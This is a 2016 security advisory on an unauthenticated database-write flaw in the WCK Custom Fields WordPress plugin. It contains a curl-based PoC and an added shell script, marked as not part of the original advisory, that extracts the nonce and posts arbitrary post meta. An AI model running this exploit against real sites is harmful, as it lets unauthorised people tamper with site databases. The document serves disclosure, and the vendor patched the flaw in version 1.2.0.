WCK - Custom Fields and Custom Post Types Creator [Unauthorized DB Access]
WCK - Custom Fields and Custom Post Types Creator plugin for WordPress suffers from an Unauthorized DB Access vulnerability
Description
The WordPress plugin WCK - Custom Fields and Custom Post Types Creator suffers from an unauthorized DB access vulnerability. An attacker can exploit the wck_add_form{$this->args['meta_name']} and wck_add_meta{$this->args['meta_name']} AJAX actions to insert arbitrary data into the database or update existing values.
If the attack is successful, the attacker can insert data or update values in the postmeta DB table even without a valid account, because these actions are registered on the wp_ajax_nopriv_ hooks and are therefore available to anyone.
PoC
First the attacker must acquire a nonce value for the wck-add-meta action. This is possible through the request action=wck_add_formwck_cfc_fields, because the wck_add_form{$this->args['meta_name']} action is available to non-privileged users:
http://example.com/wp-admin/admin-ajax.php?action=wck_add_formwck_cfc_fields
The response is a form that contains the nonce as the third argument of the addMeta() call in the .button-primary link, e.g.:
<a href="javascript:void(0)" class="button-primary"
onclick="addMeta('', '', 'f76ddf7b16')">
<span>Add Entry</span>
</a>
With this nonce the attacker can exploit the wck_add_meta{$this->args['meta_name']} action to modify post meta directly in the DB, e.g.:
POST_ID=1
ACTION=wck_add_metawck_cfc_args
META_KEY="_meta_key_"
META_VALUE="pwnd"
NONCE="f76ddf7b16"
curl -d "_wpnonce=${NONCE}&action=${ACTION}&meta=${META_KEY}&values=${META_VALUE}&id=${POST_ID}" \
"http://example.com/wp-admin/admin-ajax.php"
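The two PoC steps chained into a single script, as an added example that is not part of the original advisory: it fetches the add-form, pulls the nonce out of the addMeta() onclick attribute, and sends the add-meta POST. The sed-based parsing, the TARGET environment variable and the constructed sample response are assumptions for illustration; the action names and request parameters are the ones from the PoC above.

```shell
#!/bin/sh
# Added example, not from the original advisory: chain the two PoC steps
# (fetch the add-form, extract the nonce, POST the add-meta request).
# The sed-based parsing, the TARGET variable and the constructed sample
# response are assumptions; action names and parameters are the PoC's.

# extract_nonce: read the add-form HTML on stdin and print the third
# argument of addMeta('', '', 'NONCE'), i.e. the wck-add-meta nonce.
extract_nonce() {
  sed -n "s/.*addMeta('[^']*', *'[^']*', *'\([0-9a-f]*\)').*/\1/p" | head -n 1
}

# build_body: assemble the same POST body the advisory's curl command sends.
# Arguments: nonce action meta_key meta_value post_id
# Values are passed through unencoded, as in the advisory; a meta value
# containing '&', '=' or '%' must be percent-encoded by the caller.
build_body() {
  printf '_wpnonce=%s&action=%s&meta=%s&values=%s&id=%s' "$1" "$2" "$3" "$4" "$5"
}

# Constructed sample of the add-form response, mirroring the snippet quoted
# in the advisory, so the parser can be exercised offline.
SAMPLE_FORM=$(cat <<'EOF'
<a href="javascript:void(0)" class="button-primary"
onclick="addMeta('', '', 'f76ddf7b16')">
<span>Add Entry</span>
</a>
EOF
)

# sample_nonce: run the parser over the constructed sample.
sample_nonce() {
  printf '%s\n' "$SAMPLE_FORM" | extract_nonce
}

# run_poc: perform both requests against a live site (assumed base URL in $1).
run_poc() {
  target=$1
  nonce=$(curl -s "$target/wp-admin/admin-ajax.php?action=wck_add_formwck_cfc_fields" | extract_nonce)
  if [ -z "$nonce" ]; then
    echo "no nonce found in add-form response; plugin inactive or already patched?" >&2
    return 1
  fi
  body=$(build_body "$nonce" wck_add_metawck_cfc_args _meta_key_ pwnd 1)
  curl -s -d "$body" "$target/wp-admin/admin-ajax.php"
}

# Only touch the network when explicitly asked:
#   TARGET=http://example.com sh poc.sh
if [ -n "${TARGET:-}" ]; then
  run_poc "$TARGET"
fi
```

The script uses the nonce obtained from the wck_cfc_fields form for the wck_cfc_args add-meta action, exactly as the advisory does, since the nonce is tied to the wck-add-meta action rather than to a particular meta_name. Without TARGET set it only runs the parser over the constructed sample; against an updated target, expect either no nonce in the first response or a rejected second request.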
- Date: 3 February 2016
- Author: Pan Vag
- Vendor: www.cozmoslabs.com
- Plugin source: wordpress.org
- Plugin version: 1.1.9
- Tested on: WordPress 4.4.2
- Timeline:
  2016-02-04: Vendor notified via support forums on WordPress.org
  2016-02-05: Vendor responded
  2016-02-05: Sent issue details to vendor
  2016-02-06: Requested CVE ID
  2016-02-09: Vendor released v1.2.0 which resolves this issue